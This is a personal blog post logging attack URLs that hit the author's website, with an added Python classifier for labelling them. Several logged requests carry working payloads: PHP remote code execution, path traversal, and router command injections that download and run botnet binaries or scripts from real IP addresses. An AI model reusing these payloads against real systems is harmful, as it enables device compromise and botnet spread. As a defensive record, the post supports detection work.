一介闲人
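A record of some attack attempts against my own website. The attempts work by carrying executable code in the part of the URL that follows the domain name.
The domain http://www.test.com is used here as a stand-in for display.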
http://www.test.com/bak.zip
http://www.test.com/backup_11062022.tar
http://www.test.com/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
http://www.test.com/solr/admin/cores?action=STATUS&wt=json
http://www.test.com//vendor/phpunit/phpunit/phpunit.xsd
http://www.test.com/.svn/wc.db
http://www.test.com/robots.txt
http://www.test.com/.env
http://www.test.com/.env.example
http://www.test.com/.env.backup
http://www.test.com/core/.git/config
http://www.test.com/s/7313e2033323e2131313e27343/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
http://www.test.com/ttd.exe
http://www.test.com/cgi-bin/login.cgi
http://www.test.com/cgi-bin/luci/;stok=/locale
http://www.test.com/cgi-bin/jarrewrite.sh
http://www.test.com/.vscode/sftp.json
http://www.test.com/login.jsp
http://www.test.com/manage/account/login
http://www.test.com/systembc/password.php
http://www.test.com/.well-known/security.txt
http://www.test.com/wp-includes/wlwmanifest.xml
http://www.test.com/xmlrpc.php
http://www.test.com/Tva1
http://www.test.com/.DS_Store
http://www.test.com/cf_scripts/scripts/ajax/ckeditor/ckeditor.js
http://www.test.com/aab9
http://www.test.com/_profiler/phpinfo
http://www.test.com/videos/vts/20230726/d9/14/4d5cb760df60039c3feb18b24ba13a1c.ts
http://www.test.com/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
http://www.test.com/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.test.com/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)
http://www.test.com/?tag&tagstpl=news.html&tag={pbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))}ok{/pbohome/Indexot:if}&t=file_put_contents&t1=b5ac9b2ee49f0ee2aa0db9db957dc613.php&t2=file_get_contents&t3=https://xingzuo.zhlgch.compbcms.txt
http://www.test.com/s/7313e2033323e2131313e27343/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
http://www.test.com/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.php
http://www.test.com/index.php?lang=../../../../../../../../tmp/index1
http://www.test.com/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
http://www.test.com/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
http://www.test.com/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.217%3A88%2Ft%7Csh%3B%60)
http://www.test.com/index/ajax/lang?lang=../../application/database
http://www.test.com/dns-query?dns=sJQBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE
http://www.test.com/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
http://www.test.com/index.php?acti=search&g=global&s=api&name=content_news.html&f=database&suffix=html&c=api&key=id&m=template&usr=admin&catid=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&cat%5Bpid%5D=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&index%5Bid%5D=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&searchid=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&urlrule=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A&form_table=+keywords%3Drule+titles%3Drule+action%3Dcache+name%3Durlrule.%2A%2A%2A%41%2A%2A%72%2A%52%2A%2A%61%2A%59%2A%28%2A%2A%2A%65%2A%78%2A%2A%69%2A%2A%74%2A%2A%28%2A%2A%24%2A_%2A%2A%70%2A%61%2A%2A%2A%72%2A%61%2A%2A%6D%2A%29%2A%2A%29%2A%2A
http://www.test.com/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
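
The following is an added example, not part of the original post: a small Python classifier that decodes request targets like those listed above and labels them by content rather than by source address. The rule set, labels and sample URLs are constructed for illustration, and reading `\x5C` as a log-style hex escape of a backslash is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical rule set for this example: (label, regex run on the decoded target).
RULES = [
    ("command-injection", re.compile(r"\$\{IFS\}|\$\(|`|;\s*(?:wget|curl|chmod|rm)\b")),
    ("path-traversal", re.compile(r"(?:\.\./){2,}")),
    ("php-code-exec", re.compile(
        r"invokefunction|call_user_func_array|eval-stdin\.php|pearcmd"
        r"|allow_url_include|auto_prepend_file", re.I)),
    ("sensitive-file", re.compile(
        r"/\.(?:env|git|svn|vscode|DS_Store)\b|\.(?:zip|tar|sql|bak)(?:\.gz)?(?:$|\?)", re.I)),
]

def normalize(target: str, max_rounds: int = 3) -> str:
    """Undo \\xHH log escapes and (possibly nested) percent-encoding."""
    for _ in range(max_rounds):
        step = re.sub(r"\\x([0-9A-Fa-f]{2})",
                      lambda m: chr(int(m.group(1), 16)), target)
        step = unquote_plus(step, encoding="latin-1")  # '+' is treated as a space
        if step == target:
            break
        target = step
    return target

def classify(url: str) -> list[str]:
    """Return the label of every rule that matches the decoded request target."""
    target = normalize(re.sub(r"^[a-z][a-z0-9+.-]*://[^/]*", "", url, flags=re.I))
    return [label for label, rx in RULES if rx.search(target)]

# Constructed samples modelled on the entries above; 192.0.2.1 is a documentation address.
SAMPLES = [
    "http://www.test.com/.env.backup",
    r"http://www.test.com/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array",
    "http://www.test.com/cgi-bin/luci/;stok=/locale?form=country&country=$(id%3E%60wget+-O-+http%3A%2F%2F192.0.2.1%2Ft%7Csh%3B%60)",
    "http://www.test.com/index.php?lang=../../../../usr/local/lib/php/pearcmd&+config-create+/",
    "http://www.test.com/index/ajax/lang?lang=%252e%252e%252f%252e%252e%252fapplication/database",
    "http://www.test.com/index.html?page=2",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(classify(url) or ["no-match"], url[:60])
```

Decoding before matching is what lets the escaped and unescaped forms of the same request, and the double-encoded traversal sample, land on the same rule.
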
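This post will be updated on an ongoing basis. The content is for record-keeping, display and defensive use only; illegal use is prohibited, and anyone who misuses it bears the consequences themselves.
The following records the IPs that have attacked the site. Most are compromised "zombie" hosts overseas; the domestic ones are mostly public IPs of regional telecom resellers, which cannot simply be blocked, because doing so could leave that region unable to access the site normally. An Alibaba Cloud IP appeared once, but Alibaba Cloud refused to provide any further information about that IP to an individual. No real loss was caused, so it was not pursued; where a loss is caused, the matter can be reported to the relevant authorities, who can obtain the information. The specific records are below.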